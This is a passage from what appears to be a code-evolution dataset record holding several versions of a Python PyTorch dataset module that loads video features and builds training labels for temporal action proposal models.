len(self.video_list)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data, anchor_xmin, anchor_xmax = self._get_base_data(index)\n if self.mode == 'train':\n match_score_action, match_score_start, match_score_end = (self.\n _get_train_label(index, anchor_xmin, anchor_xmax))\n return 
(video_data, match_score_action, match_score_start,\n match_score_end)\n else:\n return index, video_data, anchor_xmin, anchor_xmax\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = np.maximum(self.temporal_gap, self.boundary_ratio *\n gt_lens)\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_action = []\n for jdx in range(len(anchor_xmin)):\n match_score_action.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_xmins, gt_xmaxs)))\n 
match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0],\n gt_end_bboxs[:, 1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action, match_score_start, match_score_end\n\n def _ioa_with_anchors(self, anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:, 1] - anchors[:, 0]\n int_min = np.maximum(anchors[:, 0], gts[:, 0])\n int_max = np.minimum(anchors[:, 1], gts[:, 1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del 
self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n 
self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 
2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), 
axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\n<mask token>\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n union_len = len_anchors - inter_len + box_max - box_min\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\n\n<mask token>\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport pandas\nimport numpy\nimport json\nimport torch.utils.data as data\nimport os\nimport torch\n\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.boundary_ratio = opt['boundary_ratio']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('Before check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def __getitem__(self, index):\n video_data, anchor_xmin, anchor_xmax = self._get_base_data(index)\n if self.mode == 'train':\n 
match_score_action, match_score_start, match_score_end = (self.\n _get_train_label(index, anchor_xmin, anchor_xmax))\n return (video_data, match_score_action, match_score_start,\n match_score_end)\n else:\n return index, video_data, anchor_xmin, anchor_xmax\n\n def _get_base_data(self, index):\n video_name = self.video_list[index]\n anchor_xmin = [(self.temporal_gap * i) for i in range(self.\n temporal_scale)]\n anchor_xmax = [(self.temporal_gap * i) for i in range(1, self.\n temporal_scale + 1)]\n try:\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video_name + '.csv')\n except:\n print('Error in ' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data, anchor_xmin, anchor_xmax\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = np.maximum(self.temporal_gap, self.boundary_ratio *\n gt_lens)\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_action = []\n for jdx in range(len(anchor_xmin)):\n 
match_score_action.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_xmins, gt_xmaxs)))\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(self._ioa_with_anchors(\n anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0],\n gt_end_bboxs[:, 1])))\n match_score_action = torch.Tensor(match_score_action)\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_action, match_score_start, match_score_end\n\n def _ioa_with_anchors(self, anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n def _ioa(self, anchors, gts):\n len_anchors = anchors[:, 1] - anchors[:, 0]\n int_min = np.maximum(anchors[:, 0], gts[:, 0])\n int_max = np.minimum(anchors[:, 1], gts[:, 1])\n np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))\n\n def __len__(self):\n return len(self.video_list)\n\n\nclass ProposalDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.subset = subset\n self.mode = opt['mode']\n if self.mode == 'train':\n self.top_K = opt['pem_top_K']\n else:\n self.top_K = opt['pem_top_K_inference']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self.feature_path = opt['feature_path']\n self.temporal_scale = opt['temporal_scale']\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n 
print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset == 'full':\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __len__(self):\n return len(self.video_list)\n\n def __getitem__(self, index):\n video_name = self.video_list[index]\n pdf = pandas.read_csv('./output/PGM_proposals/' + video_name + '.csv')\n pdf = pdf[:self.top_K]\n video_feature = numpy.load('./output/PGM_feature/' + video_name +\n '.npy')\n video_feature = video_feature[:self.top_K, :]\n video_feature = torch.Tensor(video_feature)\n if self.mode == 'train':\n video_match_iou = torch.Tensor(pdf.match_iou.values[:])\n return video_feature, video_match_iou\n else:\n video_xmin = pdf.xmin.values[:]\n video_xmax = pdf.xmax.values[:]\n video_xmin_score = pdf.xmin_score.values[:]\n video_xmax_score = pdf.xmax_score.values[:]\n return (video_feature, video_xmin, video_xmax, video_xmin_score,\n video_xmax_score)\n\n\ndef load_json(file):\n with open(file) as json_file:\n json_data = json.load(json_file)\n return json_data\n\n\nclass BMN_VideoDataSet(data.Dataset):\n\n def __init__(self, opt, subset='train'):\n self.temporal_scale = 
opt['temporal_scale']\n self.temporal_gap = 1.0 / self.temporal_scale\n self.subset = subset\n self.mode = opt['mode']\n self.feature_path = opt['feature_path']\n self.video_info_path = opt['video_info']\n self.video_anno_path = opt['video_anno']\n self._getDatasetDict()\n self.check_csv()\n self._get_match_map()\n\n def check_csv(self):\n for video in self.video_list:\n if not os.path.exists(self.feature_path + 'csv_mean_' + str(\n self.temporal_scale) + '/' + video + '.csv'):\n print('video :{} feature csv is not existed'.format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print('del ' + v + ' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n print('After check: csv \\n %s subset video numbers: %d' % (self.\n subset, len(self.video_list)))\n\n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database = load_json(self.video_anno_path)\n self.video_dict = {}\n for i in range(len(anno_df)):\n video_name = anno_df.video.values[i]\n video_info = anno_database[video_name]\n video_subset = anno_df.subset.values[i]\n if self.subset in video_subset:\n self.video_dict[video_name] = video_info\n self.video_list = list(self.video_dict.keys())\n print('%s subset video numbers: %d' % (self.subset, len(self.\n video_list)))\n\n def __getitem__(self, index):\n video_data = self._load_file(index)\n if self.mode == 'train':\n match_score_start, match_score_end, confidence_score = (self.\n _get_train_label(index, self.anchor_xmin, self.anchor_xmax))\n return (video_data, confidence_score, match_score_start,\n match_score_end)\n else:\n return index, video_data\n\n def _get_match_map(self):\n match_map = []\n for idx in range(self.temporal_scale):\n tmp_match_window = []\n xmin = self.temporal_gap * idx\n for jdx in range(1, self.temporal_scale + 1):\n xmax = xmin + self.temporal_gap * jdx\n tmp_match_window.append([xmin, 
xmax])\n match_map.append(tmp_match_window)\n match_map = np.array(match_map)\n match_map = np.transpose(match_map, [1, 0, 2])\n match_map = np.reshape(match_map, [-1, 2])\n self.match_map = match_map\n self.anchor_xmin = [(self.temporal_gap * (i - 0.5)) for i in range(\n self.temporal_scale)]\n self.anchor_xmax = [(self.temporal_gap * (i + 0.5)) for i in range(\n 1, self.temporal_scale + 1)]\n\n def _load_file(self, index):\n video_name = self.video_list[index]\n video_df = pd.read_csv(self.feature_path + 'csv_mean_' + str(self.\n temporal_scale) + '/' + video_name + '.csv')\n video_data = video_df.values[:, :]\n video_data = torch.Tensor(video_data)\n video_data = torch.transpose(video_data, 0, 1)\n video_data.float()\n return video_data\n\n def _get_train_label(self, index, anchor_xmin, anchor_xmax):\n video_name = self.video_list[index]\n video_info = self.video_dict[video_name]\n video_frame = video_info['duration_frame']\n video_second = video_info['duration_second']\n feature_frame = video_info['feature_frame']\n corrected_second = float(feature_frame) / video_frame * video_second\n video_labels = video_info['annotations']\n gt_bbox = []\n gt_iou_map = []\n for j in range(len(video_labels)):\n tmp_info = video_labels[j]\n tmp_start = max(min(1, tmp_info['segment'][0] /\n corrected_second), 0)\n tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)\n gt_bbox.append([tmp_start, tmp_end])\n tmp_gt_iou_map = iou_with_anchors(self.match_map[:, 0], self.\n match_map[:, 1], tmp_start, tmp_end)\n tmp_gt_iou_map = np.reshape(tmp_gt_iou_map, [self.\n temporal_scale, self.temporal_scale])\n gt_iou_map.append(tmp_gt_iou_map)\n gt_iou_map = np.array(gt_iou_map)\n gt_iou_map = np.max(gt_iou_map, axis=0)\n gt_iou_map = torch.Tensor(gt_iou_map)\n gt_bbox = np.array(gt_bbox)\n gt_xmins = gt_bbox[:, 0]\n gt_xmaxs = gt_bbox[:, 1]\n gt_lens = gt_xmaxs - gt_xmins\n gt_len_small = 3 * self.temporal_gap\n gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, 
gt_xmins + \n gt_len_small / 2), axis=1)\n gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + \n gt_len_small / 2), axis=1)\n match_score_start = []\n for jdx in range(len(anchor_xmin)):\n match_score_start.append(np.max(ioa_with_anchors(anchor_xmin[\n jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0],\n gt_start_bboxs[:, 1])))\n match_score_end = []\n for jdx in range(len(anchor_xmin)):\n match_score_end.append(np.max(ioa_with_anchors(anchor_xmin[jdx],\n anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))\n match_score_start = torch.Tensor(match_score_start)\n match_score_end = torch.Tensor(match_score_end)\n return match_score_start, match_score_end, gt_iou_map\n\n def __len__(self):\n return len(self.video_list)\n\n\ndef ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n scores = np.divide(inter_len, len_anchors)\n return scores\n\n\ndef iou_with_anchors(anchors_min, anchors_max, box_min, box_max):\n \"\"\"Compute jaccard score between a box and the anchors.\n \"\"\"\n len_anchors = anchors_max - anchors_min\n int_xmin = np.maximum(anchors_min, box_min)\n int_xmax = np.minimum(anchors_max, box_max)\n inter_len = np.maximum(int_xmax - int_xmin, 0.0)\n union_len = len_anchors - inter_len + box_max - box_min\n jaccard = np.divide(inter_len, union_len)\n return jaccard\n\n\nif __name__ == '__main__':\n import opts\n opt = opts.parse_opt()\n opt = vars(opt)\n train_loader = torch.utils.data.DataLoader(BMN_VideoDataSet(opt, subset\n ='train'), batch_size=opt['bmn_batch_size'], shuffle=True,\n num_workers=8, pin_memory=True)\n for a, b, c, d in train_loader:\n print(a.shape, b.shape, c.shape, d.shape)\n break\n",
"step-5": "# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport pandas\nimport numpy\nimport json\nimport torch.utils.data as data\nimport os\nimport torch\n\ndef load_json(file):\n with open(file) as json_file:\n data = json.load(json_file)\n return data\n\n\nclass VideoDataSet(data.Dataset):\n def __init__(self,opt,subset=\"train\"):\n self.temporal_scale = opt[\"temporal_scale\"] # 时域长度 归一化到100\n self.temporal_gap = 1. / self.temporal_scale # 每个snippt时间占比\n self.subset = subset # training validation or test\n self.mode = opt[\"mode\"] # 'train' or 'test'\n self.feature_path = opt[\"feature_path\"] # '特征存放位置'\n self.boundary_ratio = opt[\"boundary_ratio\"] # 0.1 人为扩充boundary的区域长度占总长度的比率\n self.video_info_path = opt[\"video_info\"] # 存在视频信息的csv\n self.video_anno_path = opt[\"video_anno\"] # 存放标记信息的csv\n self._getDatasetDict()\n self.check_csv()\n\n def check_csv(self):\n # 因为某些视频的特征可能不存在,或者遭到了损坏\n for video in self.video_list:\n if not os.path.exists(self.feature_path + \"csv_mean_\" + str(self.temporal_scale) + \"/\" + video + \".csv\"):\n print(\"video :{} feature csv is not existed\".format(video))\n self.video_list.remove(video)\n del self.video_dict[video]\n # 删除已知的错误样本\n del_videl_list = ['v_5HW6mjZZvtY']\n for v in del_videl_list:\n if v in self.video_dict:\n print(\"del \" + v +' video')\n self.video_list.remove(v)\n del self.video_dict[v]\n\n print (\"After check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n \n def _getDatasetDict(self):\n anno_df = pd.read_csv(self.video_info_path)\n anno_database= load_json(self.video_anno_path)\n self.video_dict = {} # 存放一系列内容,包括gt\n for i in range(len(anno_df)):\n video_name=anno_df.video.values[i]\n video_info=anno_database[video_name]\n video_subset=anno_df.subset.values[i] # 读取该视频属于的子数据集 training validation or test\n if self.subset == \"full\": #全部都要\n self.video_dict[video_name] = video_info\n if self.subset in video_subset:\n self.video_dict[video_name] = 
video_info # 是需要的数据集样本添加到字典中\n self.video_list = list(self.video_dict.keys()) # 含有哪些video\n print (\"Before check: csv \\n %s subset video numbers: %d\" %(self.subset,len(self.video_list)))\n\n def __getitem__(self, index):\n video_data,anchor_xmin,anchor_xmax = self._get_base_data(index)\n if self.mode == \"train\":\n match_score_action,match_score_start,match_score_end = self._get_train_label(index,anchor_xmin,anchor_xmax)\n return video_data,match_score_action,match_score_start,match_score_end\n else:\n return index,video_data,anchor_xmin,anchor_xmax\n \n def _get_base_data(self,index):\n video_name=self.video_list[index]\n anchor_xmin=[self.temporal_gap*i for i in range(self.temporal_scale)] # 0.00 d到 0.99\n anchor_xmax=[self.temporal_gap*i for i in range(1,self.temporal_scale+1)] # 0.01到1.00\n try:\n video_df=pd.read_csv(self.feature_path+ \"csv_mean_\"+str(self.temporal_scale)+\"/\"+video_name+\".csv\") # 得到这个视频的特征\n except:\n print('Error in '+video_name+\".csv\")\n video_data = video_df.values[:,:]\n video_data = torch.Tensor(video_data) # 这个video的特征[100, 400]\n video_data = torch.transpose(video_data,0,1) #[400, 100] 便于时域的一维卷积操作\n video_data.float()\n return video_data,anchor_xmin,anchor_xmax\n \n def _get_train_label(self,index,anchor_xmin,anchor_xmax): # 相当于要生成3个概率序列的真值\n video_name=self.video_list[index]\n video_info=self.video_dict[video_name] # 包括duration_second duration_frame annotations and feature_frame 但是这个特征长度已经被归一化了\n video_frame=video_info['duration_frame']\n video_second=video_info['duration_second']\n feature_frame=video_info['feature_frame']\n corrected_second=float(feature_frame)/video_frame*video_second #相当于校准时间 因为采用的滑动窗口形式进行提取特征,两个frame会存在一些差异\n video_labels=video_info['annotations']\n \n gt_bbox = []\n for j in range(len(video_labels)): #将时间归一化 0到1之间\n tmp_info=video_labels[j]\n tmp_start=max(min(1,tmp_info['segment'][0]/corrected_second),0)\n tmp_end=max(min(1,tmp_info['segment'][1]/corrected_second),0)\n 
